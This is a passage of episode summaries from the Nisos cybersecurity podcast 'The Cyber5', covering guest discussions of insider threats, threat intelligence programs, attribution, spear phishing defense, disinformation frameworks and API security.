The CYBER5 is hosted by Landon Winkelvoss, Co-Founder at Nisos, and features cybersecurity and investigations industry leaders' thoughts and answers to five questions on one topic on actionable intelligence to enterprise revolving around third-party risk
In Episode 90 of TheCyber5, we are joined by Peter Warmka, founder of the Counterintelligence Institute. Warmka is a retired senior intelligence officer with the U.S. Central Intelligence Agency (CIA) where he specialized in clandestine HUMINT (human intelligence) collection. With 20+ years of breaching security overseas for a living, Warmka now teaches individuals and businesses about the strategy and tactics of “human hacking”. Warmka highlights how insiders are targeted, the methods used by nationstates for committing crimes, and what organizations need to help focus their security training to prevent a breach. Below are the three major takeaways: Prevalent open source techniques for targeting a person or company as an insider threat: A website that defines the key personnel and mission statement of an organization provides critical context of how to target employees using social engineering techniques. Bad actors use job descriptions that provide critical targeting information about the enterprise and security technologies that are used so they may target potential technology vulnerabilities and subsequently penetrate the organization. Lastly, social media and open source content typically offer information about employees and companies that can be used for nefarious purposes. Employees are recruited for nation state espionage or crime: Adversaries pose as executive recruiters through direct engagement and through hiring platforms to elicit sensitive company information. Employees allow themselves to be socially engineered from a spearphish. Threat actors will also go so far as to create deep fakes to help sell the impression that they are a senior company executive. Security awareness training should focus on verification: There are several ways to defend yourself and your enterprise, but consistent education and training are tried and true successful methods for defense. However, annual videos for security training will not change employee behavior. They are too infrequent to modify human behavior. Employees need to be taught to be apprehensive about unsolicited outreach through email, phone call, social media, or SMS. Business procedures need to focus on quick and timely verification of suspicious activity. A policy of “trust but verify” is likely going to be too late.
In Episode 89 of TheCyber5, we are joined by Nisos Research Principal, Vincas Ciziunas. It was 7 years ago, at a restaurant in Ashburn, Virginia, when Nisos' co-founders Justin Zeefe and Landon Winkelvoss met Vincas. At the time, Vincas was working as a contractor for the US government but was considering a pivot into the private sector. It was Vincas' impressive intellect, strategic thinking, and technical capabilities that made him the ideal intelligence operator on whom to depend for the launch of Nisos. Over the course of several years, Vincas' experience, as a developer, open threat intelligence analyst, hacker, threat detection, and threat hunting expert would prove crucial to solving some of the most complex challenges Nisos' clients would bring us to solve. Once just the trio, but now known as the Nisos Dogpile, our diverse and unique team members huddle together to solve the most intractable cyber, physical, and fraud threats faced by enterprises. In this episode, Landon and Vincas recount some anonymized but most memorable investigations. These stories helped put Nisos on the map and range from Nisos' core capabilities of open source and threat intelligence, direct threat actor engagement, and technical signature analysis against cyber threat actors, to validating physical security threats, trust and safety issues, and insider threats. Make sure to follow Vincas on LinkedIn for more insights and commentary on the world of Managed Intelligence™.
In Episode 88 of TheCyber5, we are joined by Nisos Senior Director for Customer Success, Brandon Kappus. Here are five topics we discuss in this episode: Intelligence Playbooks Start with Education to the Customer Playbooks should include three major steps. The first step is education on how intelligence is going to be consumed and not be nonstop noise. Discussions between customers and vendors should start around requirements that customers are trying to address with business stakeholders. Understanding Commercially and Publicly Available Data to Avoid Noise The next step in any playbook needs to be about what data is needed to cover unique intelligence requirements. Social media, passive DNS, foreign media, business entity, person, and netflow datasets are all available, but they're meaningless without understanding what a security team is trying to accomplish. Flexibility is Critical to Meet Compliance Regulations A threat intelligence program by itself is not generally a compliance regulation like anti-virus or a DLP program. However, there are many aspects of a threat intelligence program that are inherent with compliance spending such as the ability to monitor third parties, manage vulnerabilities, track credential and data leaks, as well as mitigate against insider threats. Flexibility to adapt to compliance needs is critical for maintaining the program and is as important as addressing routine vulnerability disclosures for the SOC or giving business units a competitive advantage. Intelligence Backgrounds are Useful for Building Great Threat Intelligence Programs Two general backgrounds are common with building intelligence programs: US government intelligence community experience and those with a data engineering background. While data engineering is important for automation and bringing indicators into network defense tooling like a SIEM, intelligence community backgrounds are critical for building relationships and crafting winning value propositions across a stakeholder community. Asking the question, “what does success look like for you,” goes a long way between customers and vendors, particularly when a program is starting. Return On Investment Criteria When an intelligence program is starting, requirements are collected, and data that is needed is purchased, oftentimes return on investment comes in the form of storytelling. For example sharing how you're stopping credentials from being used or stopping an insider threat from leaking data. Over time these stories become common themes that can be built out at scale and will ultimately be used to capture “prevention dollars” and potential dollar loss from leaving the company. This story telling to capture of dollar loss should be the pinnacle of any threat intelligence program maturation.
In Episode 87 of TheCyber5, we are joined by senior information security leader Charles Garzoni. Here are five topics we discuss in this episode: Defining When Attribution is Relevant and Necessary Many corporations are not overly concerned with attribution against cyber adversaries, they just want to get back to business operations. However, if someone robbed your house, you would want to know if it was a random drive-by, or if it was your neighbor because that will inform your defenses much more appropriately. Defending Against Nation States Versus Crime Groups The ability to attribute between crime groups and nation states has large implications on a defense posture. First, organizations need to conduct a victimology assessment against themselves to determine what actors would want to steal from them. Second, an organization should list out priority threat actors targeting your sector and intellectual property. Third, they should look for customized detections and prioritized alerts as the resulting output. The Human Element of Attribution Engaging directly with threat actors (a different kind of human intelligence-HUMINT) is critical in understanding the human element of attribution, such as their motivation, TTPs, and intent. For ransomware actors, understanding their past actions will inform future recovery and negotiation efforts, for example. Organizations cannot do this without having attribution. For nation states, geopolitical context is critical to understanding security incidents, not to mention the “how” and “why” they are moving in your network. Public Disclosures of Nation State Adversaries Are Effective Public disclosures and indictments are effective disruption efforts, depending on the nation state. For example, demarche and indictment efforts against China put them on their heels and have a debilitating effect because of how they want to be seen in the world. However, Russian state operators look at disclosures as a badge of honor. Disclosures by private sector companies also can have just as much impact if the goal is to have disruption. False Flag Operations While it's easy to say you are someone else, it's challenging to look like someone else. Adversaries think masking their infrastructure to look like another adversary makes attribution challenging. Fortunately for analysts, it's very hard to mimic TTPs exactly like an adversary, thus making attribution easier for defenders. Adversaries would need to study how the TTP implementation works, and they typically don't do that. For example, when North Korea attacked Sony in 2015, their actions mimicked the same attack against a South Korean bank a year earlier in 2014 that made attribution straightforward. While they tried to improve and encrypt their command and control in 2015, the session logs between the two attacks looked almost identical.
In Episode 86 of TheCyber5, we are joined by Senior Manager of Threat Management for Nvidia Chris Cottrell. Here are six topics we discuss in this episode: What is a threat management department within enterprise security? Threat management departments are usually formed when security teams become mature and have table stakes functions within threat intelligence, red team, penetration testing, and threat hunting. These functions are usually formed after compliance, risk, governance, vulnerability management, and security operations center (SOC) are operational. Unfortunately, threat management is not a well defined lexicon in enterprise. For example, “threat hunting” in one organization could mean a SOC escalating alerts in another company. Incident Response's Role in Threat Management Incident response is usually a separate capability from threat management (red team, threat hunting, threat intelligence) and the governance, risk, and compliance (GRC) roles. Incident response is a reactive capability and has the ability to find an actor inside the environment, whereas SOC is the first reactive capability to stop the attacker at the perimeter. Threat management is still considered a proactive capability to keep attackers out at the perimeter. Defining the Roles within Threat Management Threat Hunt: Expert level investigators that know how to review network telemetry with a variety of tools and alerts and find an anomaly to investigate if an adversary is inside the environment. They usually take their clues from incident response, red team, or threat intelligence. Threat Intelligence: Expert level analysts and engineers reviewing the types of threats that could attack an organization and develop alerts and playbooks for threat hunters. They also have many other roles depending on the business. Red Team: Penetration testers that emulate or simulate adversaries within the environment to determine what alerts should be created and prioritized. Threat Intelligence Must Start with Business Requirements Threat intelligence is meaningless and not contextualized until analysts understand how the business makes money and the corresponding risks that could disrupt the business. Building a threat intelligence program from scratch can take up to a year, and the first six months will be building relationships with the business before any feeds can start to be incorporated. Stories are the Best Metrics for Threat Intelligence Programs Mean time to respond and mean time to alert are table stakes metrics for SOC, but are out of the control of the threat management team (red team, threat intel, etc). However, the better metrics for threat intelligence teams are success stories when information was actioned by a business unit and risk was averted. Reactive Capabilities When An Incident Occurs The threat management department becomes critical during a security incident. Red teamers have the mindset to look for a mistake in a vulnerability or network defense. Threat hunters have mindsets to look for mistakes in adversaries. The same mindsets are critical to investigating security events and incidents with the incident response team. Threat intelligence can conduct external threat hunting outside the firewalls when an incident occurs.
In Episode 85 of TheCyber5, we are joined by Chief Technologist of Transformative Cyber Innovation Lab for the Foundation for Defense of Democracies (FDD) Dr. George Shea. Here are four topics we discuss in this episode: What is the Operational Resiliency Framework (ORF)? The Operational Resiliency Framework (ORF) is a framework that is intended to be used by executives to ensure business continuity processes when their suppliers are knocked offline during natural disasters and cyber attacks. Defining Minimum Viable Services Step one, and the most important step, is defining a minimum level of service for all products and services. When disasters or cyber attacks occur, the minimum viable service will reveal the critical suppliers that need extra attention from a redundancy and monitoring perspective. Resilience is Not Going to Stop a Cyber Attack The ORF is not a compliance requirement nor will this framework stop a cyber attack. However, this framework is designed to help organizations respond when an attack has taken place and is ongoing. For example, if an attacker is already within the system, it's important to keep valuable services running and ensure the suppliers that enable those critical services don't go down. This framework goes beyond your perimeter to the suppliers and customers. Cyber Configurations Are Critical While this is not a cyber security framework, technical controls and configurations on the suppliers is an important part of the process for minimum viable services to be up and running.
In Episode 84 of TheCyber5, we are joined by members of the CrossCountry Consulting team: Brian Chamberlain, Offensive R&D Lead, Eric Eames, Associate Director, and Gary Barnabo, Director, Cyber and Privacy. Here are five topics we discuss in this episode: Adversary Emulation vs. Simulation and Use of Threat Intelligence Replaying attacks from adversaries is considered adversary emulation. The pros of emulation are you can react and defend against threat intelligence and the actual techniques during a penetration test. The cons are that many times these are yesterday's threats. Simulation is the art of coming up with new attack vectors with nuanced penetration testers. The pros are that these attacks give blue teams new ways to think ahead and adapt their defenses before threat actors do. The cons are that these attacks aren't yet in the wild and the probability of such attacks are not known. Values of Threat Intelligence with Red Teams Indicators of Compromise (IOCs) are immediately relevant with something that is actionable even though the value of IOCs is overcome by events (OBE) in hours. Threat intelligence IOCs are not relevant to heuristics of sophisticated adversaries and that is what sophisticated adversary simulation and threat intelligence combined attempts to overcome. For example, if an enterprise can defend against Malicious HTML Applications (HTAs), that protects them against any sort of adversary using that vector. Another example would be to have a simulated ransomware event, based on threat intel, that drops in several places and simulates everything that six different ransomware families would do (up until encryption). Tools Are Not Enough Enterprises struggle to defend if a security product does not catch an actor in the environment nor how to react in a way that forensically preserves the attacker's initial access vector. Training incident response and conducting external threat hunting are critical elements to defend and react when an attacker creates a new way to penetrate an environment. Satisfying a Chief Financial Officer's Appetite for Security In today's information technology environments, CFOs need to be conversant in cyber security, not experts. Some considerations should be: A considerable accountability on security tooling needs to be considered by CFOs because there is an overconsumption of tooling that simply does not make an impact. Further, corporate development, merger and acquisition strategy, and payments to vendors, are critical business aspects a CFO should be concerned to protect. A CFO should be empowered to initiate a penetration test unbeknownst to the security team. Adversary simulations are often highly political as a result but this kind of dialogue is beneficial for understanding incident response preparation and threat intelligence of how to defend against certain threat actors. If a company is in growth mode and over $1B in annual revenue, and if IT cannot integrate acquisitions quick enough, more should be spent on security. If a company is in profitability mode, streamlining security is probably more important. If companies are under $1B in annual revenue, spending on security is always challenging and managed services and consulting come more into play. Benchmarks Can Be Challenging Many companies want benchmarks on how they stack up to industry peers. Every company is different and no two environments are the same so stacking up against industries like third party risk “scores” is challenging and not advisable.
Topic: Title: Data Governance and Threat Intelligence Converge In Episode 83 of TheCyber5, we are joined by our guest, Egnyte's Chief Governance Officer, Jeff Sizemore. We discuss the Cybersecurity Maturity Model Certification (CMMC) and the impact on Department of Defense (DOD) contractors to mature their cybersecurity hygiene in order to compete for US government contracts. CMMC was based on NIST Standards 800-71. Here are 4 topics we discuss in this episode: Why Does CMMC Matter? In the near future, contracts are going to be rated L1-3 and if contractors are not certified up to a certain level, they cannot bid on the contract. This is more focused on the smaller defense contractors who up to now, have generally disregarded compliance measures yet are major targets for nation state cyber attacks. Failure to Comply with CMMC Could Mean Perjury Compliance for DOD contractors is not new and companies were previously allowed to self-attest. When DOD regulatory bodies did the research, 75% of companies were found to be not in compliance. For enforcement, the Department of Justice is now involved and if contractors lie, it's considered perjury. Compliance Cybersecurity Controls Contractors Can Implement Before choosing an email provider, cloud environment, or file share, be sure they are FedRamp compliant. Automate the search capability within secure enclaves so CUI is detected in an environment. Automate the ability to be audited so contractors aren't wasting time in spreadsheets. Incident Response and Threat Intelligence Controls Needed Threat intelligence is in an evolutionary stage for larger contractors to monitor their subcontractors to determine if they have vulnerabilities and/or if they have been breached. Third party risk score cards are generally not actionable for defense contractors because the vulnerabilities are not put into context to a business risk. The key is to bring together a threat intelligence picture that can alert on actionable data leaks.
In episode 82 of The Cyber5, we are joined by guest moderator and senior intelligence analyst for Nisos, Valerie Gallimore, and CEO of BGH Security, Tennisha Martin. In this episode, we discuss the challenges and opportunities of promoting and enabling diversity and inclusion in cyber security. Key Takeaways: Showing Impact for Diversity and Inclusion (D&I) within Security Beyond filling cyber security skills gaps, some metrics that show success in D&I include: Jobs Feeling more confident in interviews Recommending minorities for employment opportunities Educate about opportunities outside of the technical positions such as project management, customer success, product management, marketing, and sales Certifications Transition to cyber security from other career fields 2) Giving back to the Cybersecurity Community Volunteering to help educate the next generation of ethical hackers or cybersecurity specialists. Donating funds to nonprofit organizations that assist people interested in pursuing a career in cybersecurity. Volunteering time instructing courses or sessions on issues to assist individuals in gaining exposure to the cybersecurity sector. 3) Being part of a supportive virtual community. Having a community of people that you can talk to, even though they're not necessarily near you, about issues you are encountering in the industry. Having people that you can relate to and reach out to because they are navigating through the same path as you are. Having a psychological safe space for people to problem solve, and brainstorm and feel like they're not being judged. Help people that are new in cybersecurity feel comfortable and stay in the industry.
In episode 81 of The Cyber5, we are joined by the Head of Insider Threat at Uber and CEO of Vaillance Group, Shawnee Delaney. In this episode, we provide an overview of different functions within an insider threat program. We also discuss the support open source intelligence provides to such programs and how to change company culture to care about insider threats. We also discuss the ROI metrics that are important to different stakeholders when implementing an insider threat program. Three Takeaways: Departments and Functions within Insider Threat Insider threat programs are relatively new in enterprise security and often change from company to company. Open source intelligence can be a standalone role or be cross functional among all departments. Common departments and functions can be: Open source intelligence. Forensics monitoring. Training and awareness (steering committees for stakeholders, benchmarking). Technical and behavioral monitoring (UEBA or DLP). Supplier due diligence. Global investigations. Global intelligence analysis. 2) Common Problems Faced by Insider Threat Teams Common challenges faced by insider threat teams: Privacy to ensure employee confidentiality is not violated. Tooling to have visibility into malicious events from normal behavior. Finding practitioners that can do the technical monitoring and open source intelligence. Shifting culture to be more security conscious. Focus on physical security issues, like active shooter situations, just as much as data exfiltration and other cyber concerns. 3) Role of Open Source intelligence in Insider Threat Programs An Insider threat program is a key stakeholder for a threat intelligence program, not the individual buyer. Three key areas where open source intelligence (OSINT) supports insider threat programs: Employee lifecycle management: ensuring employees, former employees, and prospects are not an insider threat based on what they post on the internet. Validating red flag indicators with OSINT. Investigations into vendors.
In episode 80 of The Cyber5, we are joined by Executive Director of the DISARM Foundation, Jon Brewer. We discuss the mission of the DISARM Framework, which is a common framework for combating disinformation. Much like how the MITRE ATT&CK framework is used for combating cyber attacks, the DISARM framework is used to identify what Jon calls “cognitive security.” What that means is all the tactics, techniques, and procedures used in crafting disinformation attacks and influencing someone's mind. This includes the narratives, accounts, outlets, and technical signatures used to influence a large population. We chat about what success looks like for the foundation and specific audiences used to help the population in understanding how disinformation actors work. Three Takeaways: 1. What is the DISARM Framework? DISARM is the open-source, master framework for fighting disinformation through the coordination of effective action. It was created by cognitive security expert SJ Terp. It is used to help communicators, from whichever discipline or sector, to gain a clear, shared understanding of disinformation incidents and to immediately identify the countermeasure options that are available to them. It is similar to the MITRE ATT&CK framework which provides a list of TTPs that malicious actors conduct cyber attacks. 2. Similarities Between DISARM and MITRE ATT&CK Frameworks: Cognitive Security vs Cyber Security Cognitive security and the DISARM framework is analogous to cyber security and the MITRE ATT&CK framework. Cognitive security are the TTPs that actors influence minds and cyber security are actors' ability to steal data from networks. MITRE ATT&CK's list covers the different TTPs of the cyber kill chain: Reconnaissance Resource Development Initial Access Execution Persistence Privilege Escalation Defense Evasion Credential Access Discovery Lateral Movement Collection Command and Control Exfiltration DISARM's list covers different TTPs of the disinformation chain: Plan Strategy Plan Objectives Target Audience Analysis Develop Narratives Develop Content Establish Social Assets Establish Legitimacy Microtarget Select Channels and Affordances Conduct Pump Priming Deliver Content Maximize Exposure Drive Online Harms Drive Offline Activity Persist in Information Environment Assess Effectiveness 3. Disinformation: A Whole of Society Problem While MITRE ATT&CK is mostly a business to business framework for enterprises to defend against cyber attacks. The DISARM framework is both a B2B framework for companies like technology and journalism, but also more broadly to consumers. This will take much more support from non-profits and public sector organizations like police and education systems.
In episode 79 of The Cyber5, we are joined by senior security practitioner, Garrett Gross. We discuss the age old problem of spear phishing and why enterprises still struggle to fix this problem. We talk about the critical processes and technologies necessary to defend against spear phishing, including robust training programs and endpoint detections. We also cover how to use the telemetry collected from spear phishing and integrate this with outside threat intelligence to be useful. Five Takeaways: Security Teams Need to Make a Sensor Network from the Employee Base Attackers win consistently when they get employees to click malicious spear phishing links. They use social engineered communications, usually over email, that appear legitimate but have malicious intent to trick a user to open a document or click on a link to obtain sensitive information about a user. Security training is boring and employees outside of security don't pay attention to the annual reminders. Real education must be relatable to employees so that they can identify when a malicious link is deployed against them. The most critical training a security team can do is get a sensor network from their employees to spell out the ripple effects to employees for PII and intellectual property theft after a malicious link is executed. Experts Must Create Critical Processes and Use Technologies Defend Against Spear Phishing A closed door approach to security is not efficient. Experts transparently interacting with the employee base defends against spear phishing. A phased approach will be necessary to assess the necessary logging in an automated way as this takes months to configure and properly alert. The building blocks of this approach are: An endpoint detection and response solution (EDR) is the most important tool to defend against spear phishing. An automated way to report incidents should be considered so users are not waffling on whether or not to report incidents. It should go without saying, but no one should get in trouble for reporting an incident. Spear Phishing Typically Impersonates Executives; Executives Should Conduct PII Removal and PII Poisoning The sophistication and reconnaissance of advanced adversaries are challenging to detect, particularly when bad actors impersonate executives. Verifying information over the phone is often needed to circumvent advanced attempts to social engineer an employee base. Further, publicly available information about executives should be scrubbed and removed from the internet on a routine basis. Use of Spear Phishing Telemetry with Threat Intelligence for Small and Medium Size Business Small companies with limited security personnel will be fortunate to get employees to get banners saying emails are coming from an external source. They will spend a small part of their day conducting internal threat hunting. They won't be able to conduct external threat hunting to determine the sophistication of a spear phishing campaign. They need to partner with managed intelligence providers to do external threat hunting effectively. “Defensibility” Measures are Critical Success Metrics: Threat Intelligence and Red Teams Quantifying reports and solutions that show how a security team is systematically reducing risks that affect their business is the only way budgets will get increased by the board. To prove that various attacks will matter to a business, threat intelligence with subsequent red teaming are the primary ways to illustrate the issues to an executive team.
In episode 78 of The Cyber5, we are joined by our guest, Gaurang Shah, former senior lead technology manager at Booz Allen Hamilton. We talk about the challenges of digital transformation and cybersecurity in the US federal government. We discuss solutions for bringing innovative technology and bespoke services into the federal space and how to shorten long procurement cycles. We also cover what the federal government can learn from the private sector, including how to shrink the ongoing cyber skills shortage. Four Takeaways: Federal CISOs and CIOs Think Cloud Migrations Will Not Bake in Security Outside of the US national security, intelligence, and DOD sectors, many civilian agency CIOs and CISOs in the US federal sector have the following shortcomings with regard to cloud migration: First, they think security will be baked in as part of cloud migrations to AWS, Azure, or GCP when that is not reality. Second, cloud implementation is for infrastructure-as-a-service but way behind in software-as-a-service and application security. Third, they are either not aware of their expanding attack surface with a lack of enterprise security culture or there is an inability to gain funding for their security initiatives. Last, they have trouble retaining talent from the private sector. 2) Build Versus Buy Debate in the US Civilian Agencies Procurement in many of the civil agencies within the US federal government is based on the lowest cost acceptable and not necessarily on value delivered for efficiency. They also cannot hire and retain talent at costs compared to the private sector, so building technology is extremely challenging. In many civilian organizations, they aren't doing threat intelligence and incident response at the scale and speed necessary. 3) Approaches for Overcoming Cyber Skills Shortage Gap Understanding the federal government will lose on hiring top talent due to lowest cost acceptable restrictions in the procurement cycle, we recommend training IT, enterprise architects, database administrators, and system administration personnel who want to grow into security, particularly in automation. 4) Future of Outsourcing to Managed Services Experts and Codifying Appropriate Threat Models Some civilian agencies will likely need to outsource portions of SOC operations to managed services companies over the coming years. Some agencies are out-sourcing Level 1 alerting, for example, while keeping the escalations Level 2-4 in house. However, for the US federal government as a whole to be successful, there needs to be an agreed upon risk posture framework that many civilian agencies adhere to so that automation in detection and response can be achieved at the scale needed in the federal space. Further, application and software security are way behind and much of the focus is on infrastructure security. Unfortunately, outsourcing is still reticent in the federal space because of supply chain concerns. However, the federal government may have no choice but to implement aspects of next-generation SOC through outsourcing to a higher degree of experts.
In episode 77 of The Cyber5, we are joined by our guest, Eric Lekus, Senior Manager for Threat Intelligence at Deloitte. Eric delivers for Deloitte's internal security team and is not a client-facing consultant. We talk about how to evolve cyber threat intelligence in a SOC environment, beyond basic indicators of compromise (IOC) integration. We discuss the different stakeholders a CTI team has beyond a SOC, but also focus on what a CTI team needs to push and pull from a SOC to be relevant for a broader audience. We also outline success metrics for a CTI team. Four Takeaways: 1. Indicators of Compromise are a Baseline Activity, Not Holistic Threat Intelligence Indicators of compromise consist of known malicious IPs and domains. Stakeholders expect security teams to be doing this as a baseline. However, IPs and domains can change in the matter of seconds so it's not fruitful to only rely on IOCs to be integrated into a SIEM that alerts with other network traffic and logging. 2. A Security Operations Team Already Has A Rich Source of Baseline Activity; Enrich with Threat Intelligence Security teams should be integrating many sources of logging, such as IPs from emails, using threat intelligence to alert on malicious activity. This should then establish two-way communication where a threat intelligence team is pulling information from the SOC to enrich and provide feedback. A SOC team is generally writing tickets for alerts and a threat intelligence team can't just ask for bulk data; therefore automation to integrate into threat intelligence platforms is critical. A SOC analyst will ask, “what's in it for me” and a threat intelligence professional should address this. 3. Threat Intelligence Should be a Separate Entity from the SOC; They Have Numerous Customers The following services are generally associated with cyber threat intelligence teams. Since the SOC is a major stakeholder, the CTI usually has the following functions: Adversary infrastructure analysis Attribution analysis Dark Web tracking Internal threat hunting Threat research for identification and correlation of malicious actors and external datasets Intelligence report production Intelligence sharing (external to the organization) Tracking threat actors' intentions and capabilities Malware analysis and reverse engineering Vulnerability Research and indicator of compromise analysis (enrichment, pivoting, and correlating to historical reporting) 4) Success for Security Teams Means Reducing Risk Through Outcomes Regardless of who the stakeholders are in an organization, improving security should be focused around reducing risk and influencing outcomes for disrupting actors. This should be accomplished in alignment with the executive team and the culture of the organization. Showing how you are reducing risk over time is what makes threat intelligence teams successful in the eyes of business executives.
In episode 76 of The Cyber5, guest moderator and Nisos Director for Product Marketing, Stephen Helm, is joined by our guest, Dr. Maria Robson, the Program Coordinator for the Intelligence Project of the Belfer Center at Harvard University's Kennedy School. We discuss the evolution of intelligence roles in enterprise and the ultimate path for intelligence professionals. We cover ethics in private sector intelligence teams and the role of academia in fostering not only the ethics, but also the professionalization of private sector intelligence positions. Dr. Robson also discusses insights into how proactive intelligence gathering capabilities tends to provide most value to enterprise. Finally, she gives an overview of the Association of International Risk Intelligence Professionals work and mission. Three Takeaways: Ethical Focus is Critical Ethical lines of consideration and having a standard of what is appropriate for collection and analysis is important but currently very murky. Collection and analysis for the U.S. Intelligence Community would be entirely inappropriate and illegal when collecting against private sector persons and organizations. Standards would ensure, for example, that new analysts know what was in and out of bounds of the type of inquiry that can be answered. The Association of International Risk Intelligence Professionals (AIRIP) is leading the way to identify these standards. Apprentice and Guild Process is Critical if Standards are Slow to be Developed Craft and guild process is important to get jobs in private sector intelligence because there is no linear pathway to employment. Since networking and a manager's previous experience in the intelligence community, non-profit, or private sector are the driving forces behind mentorship, craft and guild benchmarking and professionalization become important models. Security Organization and Reporting Structure Has Changed Cyber threat intelligence, geopolitical risk, and corporate security have historically been the security functions. Before digging into how cyber threat intelligence benefits a physical security program, we identify a list of some of the services, products, and analyses that a CTI program might address. The following services have significant overlap with physical security programs: Adversary infrastructure analysis Attribution analysis Dark Web tracking Internal threat hunting Threat research for identification and correlation of malicious actors and external datasets Intelligence report production Intelligence sharing (external to the organization) Tracking threat actors' intentions and capabilities Other CTI services generally do not overlap with physical security and remain the responsibility of cybersecurity teams. These services include malware analysis and reverse engineering, vulnerabilities research, and indicator analysis (enrichment, pivoting, and correlating to historical reporting). Security teams are now leveraging open-source intelligence and cyber threat intelligence to provide critical information to physical security practitioners. The physical and corporate security programs of these teams generally consist of the following disciplines, with use cases that are at the center of the convergence of cyber and physical security disciplines: Executive Protection and Physical Asset Protection Travel Security Regulatory/Environmental Risk Specific to Business Geo-Political Risk Supply Chain Risk Management Global Investigations
In episode 75 of The Cyber5, we are joined by Grist Mill Exchange CEO, Kristin Wood. We discuss open source intelligence (OSINT) use in the U.S. public sector, not only with national security but also with the emergency response sectors. We talk about how open source intelligence has evolved in the last ten years and talk about how adversaries use open source intelligence against us. We also discuss how the U.S. needs to catch up with not only how to operationalize OSINT in meaningful ways, but how the U.S. government can procure bleeding edge technologies in a more time sensitive manner to meet mission requirements. Three Takeaways: Open Source Intelligence Has Evolved From Just Foreign Media; It's The New All-Source Intelligence The national security sector traditionally used open source intelligence as translating foreign media particularly during crisis situations. Now, open source intelligence is being leveraged in many ways like all source intelligence - the integration of human, signal, and imagery intelligence. Interconnectivity of devices has led to a commercial “goldrush” to aggregate data and sell it to public and private sector clients. China is Remarkable at Open Source Intelligence Using Autocracy as an Advantage China and Russia are collecting open source intelligence at an unprecedented level against the U.S. including what's commercially available and through computer network exploitation and data exfiltration. They are aiming to reframe the U.S. using disinformation as a powerful tool. They have been very successful in leveraging online disinhibition effects against the U.S. populace. The United States Public Sector Needs an Overhaul in Procurement Authority The U.S. private sector has a lot to teach the U.S. public sector in terms of learning consumer behaviors and how to pair that with commercially derived data, such as device fingerprinting, to extract valuable insights for national security purposes. To accomplish this, analysts need to be able to circumvent cumbersome government procurement buying cycles.
In episode 74 of The Cyber5, we are joined by Robert Gummer, the Director of the Global Security Operations Center (GSOC) for the National Football League (NFL). First, we talk about how to expand the mission of a global security operations center (GSOC) using open source intelligence. We talk about the role of vendors in the GSOC ecosystem and how open source intelligence can be aggregated in the case management systems across all facets of a GSOC fusion center. We also talk about how to educate business stakeholders to make them a valuable intelligence consumer. We further discuss how a GSOC can model collection and analysis around successful outcomes for the business, both from a risk management function, but also as a business enabler. Five Takeaways: Functions of the Modern Day GSOC: A Blend of Physical and Cyber Security A GSOC is a fusion center - the blend of physical security, cyber security, emergency preparedness, business continuity, and global investigations around any and all threats to an enterprise. Most physical security threats have a cyber or digital nexus. Active shooters, someone flying a drone over a location, and ransomware threats that shut down business continuity all have equal threats to business that need to be dealt with in a collaborative environment. Key for Open Source Intelligence to Solve Business Problems: Eliminating Coverage Gaps is an 18-Month Process There are two main categories of datasets to map, those are traditional open-source intelligence and non-traditional open-source intelligence. Traditional open-source intelligence datasets encompass the qualitative and quantitative collection and analysis of public, non-classified sources that deliver context such as archives, business records, dating sites and dark web. Non-traditional open-source intelligence datasets include the human, signals, and imagery intelligence equivalents in OSINT – based on anything from threat actor engagement on social media to external telemetry (netflow, passive DNS, cookies) to social media photos used to pinpoint locations. Dialing in the threat intelligence landscape and reviewing vendors to determine who has the better social media and data coverage is a lengthy process, sometimes taking 18 months to get right. Aggregation of Intelligence is Still a Maturing Process for Many Physical Security Teams While mature physical security teams have an incident system that sends notifications for action, there still is not a single source of truth that aggregates everything together. Finding vendors that want to integrate with other vendor platforms is still a challenge. Vendors should not look to displace other vendors, rather they should try to integrate with systems like a Virtual Contact Center (VCC) platform. Vendor Relationships are Partnerships and Real Intelligence Providers; GSOC Focuses on Educating Stakeholders to Drive Feedback and Integration with Business Requirements There is no turnkey solution for triaging alerts in a GSOC and business stakeholders do not understand the GSOC and open source intelligence space. It takes months of triaging alerts and molding filters to get the right information that boils down real threats. Vendor relationships should be leveraged as partnerships to help triage the right alerts, give actionable intelligence, and integrate with existing enterprise systems. Then, GSOC stakeholders can spend more of their time educating the business stakeholders to become more valuable intelligence consumers where feedback is given that gives enterprises a competitive advantage with regard to risk. Top 10 Use Cases for OSINT; Review of Tangible Examples In addition to reputation use cases such as diligence on social media personalities that could negatively impact brands, below are 10 additional examples of OSINT use cases for the GSOC: Executive Protection Physical Asset Protection Travel Security Regulatory/Environmental Risk Specific to Business Geo-Political Risk Global Investigations Fraud Detection Threat Surface Assessment M&A Security Due Diligence Ethical Hacking
In episode 73 of The Cyber5, we are joined by Snap Finance Chief Security Officer Upendra Mardikar. We discuss how threat intelligence is used in application programming interface (API) security and development security operations (devsecops). Any organization building an application has data or user-generated content as the primary product. Once connected to customers, consumers, clients, or partners there is a new set of security considerations generated. The API serves as the software intermediary that allows two applications to talk to one another. It's bad enough if an attacker exfiltrates sensitive data, but imagine if they are able to gain visibility to see who is querying for the data held in the application. Imagine if Russia can see who is querying certain individuals in a credit bureau data set. That's a whole other set of problems organizations face. As we've talked about in previous podcasts, devsecops is the security of protecting the software development lifecycle (SDLC). We talk about why API security should be added to the wider MITRE ATT&CK framework and further discuss the impact of organizational immaturity as it relates to tackling API and DevOps security. Five Key Takeaways: 1) APIs are at the Forefront of Digital Transformation and Must be Protected APIs go north/south between the company and customers and east/west establishing interconnectivity between different applications within the enterprise. A giant need exists to go “outside the firewall” to observe threats that are attacking APIs because they are fundamental to many enterprise functions, regardless of industry. 2) API Security is Very Immature in Enterprise Many security practitioners focus on north/south protections of APIs and implement firewalls and DDoS protections to keep intruders out of the environment. However this is a myopic strategy because it does not protect against lateral movement and privilege escalation when an attacker compromises perimeter security. When perimeter security is compromised, protecting east/west APIs becomes critical. We are seeing trends around Zero Trust. Zero Trust is based on the premise that location isn't relevant and users and devices can't be trusted until they are authenticated and authorized. To gain security from a zero trust security model, we must therefore apply these principles to our APIs. This aligns well since modern API-driven software and apps aren't contained in a fixed network — they're in the cloud — and threats exist throughout the application and infrastructure stack. An API-driven application can have thousands of microservices, making it difficult for security and engineering teams to track all development and their security impact. Adopting zero trust principles ensures that each microservice communicates with the least privilege, preventing the use of open ports and enabling authentication and authorization across each API. The end goal is to make sure that one insecure API doesn't become the weakest link, compromising the entire application and data. 3) Integrating API Security into the MITRE ATT&CK Framework API Security is different from traditional application security (OWASP), which is integrated into the MITRE ATT&CK Framework along with attacks on servers, endpoints, and TLS, etc. API security focuses more on the potential attacks of exposed, internet-facing microservices in addition to the business logic. API security primarily focuses on: Users: The most common API vulnerabilities tend to be centered around issues with an authorization that enables access to resources within an API-driven application. Transactions: Ensuring that transport layer security (TLS) encryption 